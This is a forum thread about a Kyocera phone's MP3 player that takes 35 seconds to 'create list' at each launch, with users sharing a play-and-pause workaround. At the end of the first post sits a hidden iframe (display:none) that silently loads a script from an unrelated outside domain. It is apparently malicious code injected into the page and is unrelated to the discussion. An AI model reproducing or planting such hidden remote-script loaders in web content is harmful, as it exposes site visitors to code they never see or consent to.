+ Reply to Thread

"Creating List" takes forever (MP3 Player)

Am I the only one who has to wait 35 seconds EVERY time I launch the MP3 player? It says "creating list" and I literally cannot do anything for 35 seconds. Then if I exit to consult my datebook (or whatever) I have to go thru the same ordeal when I relaunch MP3.

I've tried formatting the SD card in the phone but that didn't make a difference. It's a SANDisk 256 card and I've got maybe 7 megs free on it.

I wonder if there's another MP3 player out there that works on this phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Apparently the app is refreshing the playlist every time.
    What I do sometimes is start a song playing and pause it. You should be able to switch into and out of the player without having it re-create the list. I have seen it re-create once even with this trick; not sure why.

Yes, this appears to be a particularly boneheaded bug in the MP3 player. Luckily, there will be better 3rd party players - obviously this one was offered by Kyocera as an object lesson in how NOT to write one. Palmnut here on the board is apparently working toward beta on one right now.

Originally posted by KLiuLess
    What I do sometimes is start a song playing and pause it. You should be able to switch into and out of the player without having it re-create the list. I have seen it re-create once even with this trick; not sure why.
    That works. Bless you. Just saved me 35 x 7 seconds a day.